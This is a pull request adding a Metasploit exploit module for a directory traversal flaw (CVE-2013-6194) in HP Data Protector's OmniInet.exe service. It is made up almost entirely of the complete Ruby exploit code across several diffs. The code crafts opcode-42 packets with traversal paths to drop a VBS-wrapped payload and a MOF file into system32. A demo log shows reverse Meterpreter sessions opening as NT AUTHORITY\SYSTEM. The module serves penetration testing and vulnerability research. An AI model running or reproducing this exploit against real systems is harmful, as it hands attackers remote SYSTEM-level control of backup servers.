### PR TITLE
Add module for ZDI-14-003

### DIFF
--- a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb
@@ -1,0 +1,169 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::EXE
+  include Msf::Exploit::WbemExec
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HP Data Protector Backup Client Service Directory Traversal',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in the Hewlett-Packard Data
+        Protector product. The vulnerability exists at the Backup Client Service (OmniInet.exe)
+        when parsing packets with opcode 42. This module has been tested successfully on HP Data
+        Protector 6.20 on Windows 2003 SP2.
+      },
+      'Author'         =>
+        [
+          'Brian Gorenc', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-6194' ],
+          [ 'OSVDB', '101630' ],
+          [ 'BID', '64647' ],
+          [ 'ZDI', '14-003' ],
+          [ 'URL' , 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422' ]
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'Space'       => 2048, # Payload embedded into an exe
+          'DisableNops' => true
+        },
+      'DefaultOptions'  =>
+        {
+          'WfsDelay' => 5
+        },
+      'Platform'        => 'win',
+      'Targets'         =>
+        [
+          [ 'HP Data Protector 6.20 build 370 / Windows 2003 SP2', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 02 2014'))
+
+    register_options([Opt::RPORT(5555)], self.class)
+  end
+
+  def check
+    fingerprint = get_fingerprint
+
+    if fingerprint.nil?
+      return Exploit::CheckCode::Unknown
+    end
+
+    print_status("HP Data Protector version #{fingerprint}")
+
+    if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
+      minor = $1.to_i
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    if minor < 21
+      return Exploit::CheckCode::Vulnerable
+    elsif minor == 21
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Detected
+    end
+
+  end
+
+  def exploit
+
+    # Setup the necessary files to do the wbemexec trick
+    vbs_name = rand_text_alpha(rand(10)+5) + '.vbs'
+    exe      = generate_payload_exe
+    vbs      = Msf::Util::EXE.to_exe_vbs(exe)
+    mof_name = rand_text_alpha(rand(10)+5) + '.mof'
+    mof      = generate_mof(mof_name, vbs_name)
+
+    print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{vbs_name}")
+    res = upload_file("windows\\system32\\#{vbs_name}", vbs)
+
+    if res and res.length == 4 and res.unpack("N").first == 0x1b4
+      print_good("#{peer} - #{vbs_name} uploaded successfully")
+      register_file_for_cleanup(vbs_name)
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{vbs_name}")
+    end
+
+    print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}")
+    res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
+
+    if res and res.length == 4 and res.unpack("N").first == 0x1b4
+      print_good("#{peer} - #{mof_name} uploaded successfully")
+      register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}")
+    end
+
+  end
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  def build_pkt(fields)
+    data = "\xff\xfe" # BOM Unicode
+    fields.each do |v|
+      data << "#{Rex::Text.to_unicode(v)}\x00\x00"
+      data << Rex::Text.to_unicode(" ") # Separator
+    end
+
+    data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
+    return [data.length].pack("N") + data
+  end
+
+  def get_fingerprint
+    ommni = connect
+    ommni.put(rand_text_alpha_upper(64))
+    resp = ommni.get_once(-1)
+    disconnect
+
+    if resp.nil?
+      return nil
+    end
+
+    return Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last nl
+  end
+
+  def upload_file(file_name, contents)
+    connect
+    pkt = build_pkt([
+      "2", # Message Type
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      rand_text_alpha(8),
+      "42", # Opcode
+      rand_text_alpha(8), # command
+      rand_text_alpha(8), # rissServerName
+      rand_text_alpha(8), # rissServerPort
+      "\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate
+      contents # Certificate contents
+    ])
+    print_status("Sending malicious packet with opcode 42...")
+    sock.put(pkt)
+    res = sock.get_once
+    disconnect
+
+    return res
+  end
+
+end

--- a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Unknown
     end
 
-    print_status("HP Data Protector version #{fingerprint}")
+    print_status("#{peer} - HP Data Protector version #{fingerprint}")
 
     if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
       minor = $1.to_i
@@ -92,6 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
     mof_name = rand_text_alpha(rand(10)+5) + '.mof'
     mof      = generate_mof(mof_name, vbs_name)
 
+    # We can't upload binary contents, so embedding the exe into a VBS.
     print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{vbs_name}")
     res = upload_file("windows\\system32\\#{vbs_name}", vbs)
 
@@ -158,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
       "\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate
       contents # Certificate contents
     ])
-    print_status("Sending malicious packet with opcode 42...")
+    vprint_status("#{peer} - Sending malicious packet with opcode 42...")
     sock.put(pkt)
     res = sock.get_once
     disconnect

--- a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits a directory traversal vulnerability in the Hewlett-Packard Data
         Protector product. The vulnerability exists at the Backup Client Service (OmniInet.exe)
         when parsing packets with opcode 42. This module has been tested successfully on HP Data
-        Protector 6.20 on Windows 2003 SP2.
+        Protector 6.20 on Windows 2003 SP2 and Windows XP SP3.
       },
       'Author'         =>
         [
@@ -84,7 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-
     # Setup the necessary files to do the wbemexec trick
     vbs_name = rand_text_alpha(rand(10)+5) + '.vbs'
     exe      = generate_payload_exe
@@ -93,26 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote
     mof      = generate_mof(mof_name, vbs_name)
 
     # We can't upload binary contents, so embedding the exe into a VBS.
-    print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{vbs_name}")
-    res = upload_file("windows\\system32\\#{vbs_name}", vbs)
+    print_status("#{peer} - Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...")
+    upload_file("windows\\system32\\#{vbs_name}", vbs)
+    register_file_for_cleanup(vbs_name)
 
-    if res and res.length == 4 and res.unpack("N").first == 0x1b4
-      print_good("#{peer} - #{vbs_name} uploaded successfully")
-      register_file_for_cleanup(vbs_name)
-    else
-      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{vbs_name}")
-    end
-
-    print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}")
-    res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
-
-    if res and res.length == 4 and res.unpack("N").first == 0x1b4
-      print_good("#{peer} - #{mof_name} uploaded successfully")
-      register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
-    else
-      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}")
-    end
-
+    print_status("#{peer} - Sending malicious packet with opcode 42 to upload the mof file #{mof_name}")
+    upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
+    register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
   end
 
   def peer
@@ -159,12 +145,13 @@ class Metasploit3 < Msf::Exploit::Remote
       "\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate
       contents # Certificate contents
     ])
-    vprint_status("#{peer} - Sending malicious packet with opcode 42...")
     sock.put(pkt)
-    res = sock.get_once
+    sock.get_once
+    # You cannot be confident about the response to guess if upload
+    # has been successful or not. While testing, different result codes,
+    # including also no response because of timeout due to a process
+    # process execution after file write on the target
     disconnect
-
-    return res
   end
 
 end


### PR DESCRIPTION
Tested successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows XP SP3 with HP Data Protector version HP Data Protector A.06.20
## Verification
- [x] Install WIN 2003 SP2
- [x] Install HP Data Protector version HP Data Protector A.06.20, internal build 370, or any other vulnerable version (6.xx < 6.21 patched according to the advisory). Ask me for installer if you can't figure it how to download from the HP Page. Had the installer archived. Not sure if it's available anymore on the HP site.
- [x] Be sure which the vulnerable OmniInet.exe service is running on the port TCP 5555
- [x] Run the module like in the demo, hopefully enjoy sessions
## Demo

```
msf > use exploit/windows/misc/hp_dataprotector_traversal 
msf exploit(hp_dataprotector_traversal) > set rhost 192.168.172.244
rhost => 192.168.172.244
msf exploit(hp_dataprotector_traversal) > check

[*] 192.168.172.244:5555 - HP Data Protector version HP Data Protector A.06.20: INET, internal build 370, built on Friday, February 25, 2011, 6:41 PM
[+] The target is vulnerable.
msf exploit(hp_dataprotector_traversal) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.244:5555 - Sending malicious packet with opcode 42 to upload the vbs payload tGVDBd.vbs...
[*] 192.168.172.244:5555 - Sending malicious packet with opcode 42 to upload the mof file pwXbUDaxePyDsw.mof
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1186) at 2014-01-17 00:51:00 -0600
[+] Deleted tGVDBd.vbs
[+] Deleted wbem\mof\good\pwXbUDaxePyDsw.mof

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(hp_dataprotector_traversal) > set rhost 192.168.172.136
rhost => 192.168.172.136
msf exploit(hp_dataprotector_traversal) > check

[*] 192.168.172.136:5555 - HP Data Protector version HP Data Protector A.06.20: INET, internal build 370, built on Friday, February 25, 2011, 6:41 PM
[+] The target is vulnerable.
msf exploit(hp_dataprotector_traversal) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:5555 - Sending malicious packet with opcode 42 to upload the vbs payload eutCulOEpP.vbs...
[*] 192.168.172.136:5555 - Sending malicious packet with opcode 42 to upload the mof file xCTTT.mof
[*] Sending stage (769024 bytes) to 192.168.172.136
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.136:1137) at 2014-01-17 00:51:49 -0600
[+] Deleted eutCulOEpP.vbs
[+] Deleted wbem\mof\good\xCTTT.mof

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(hp_dataprotector_traversal) > 
```
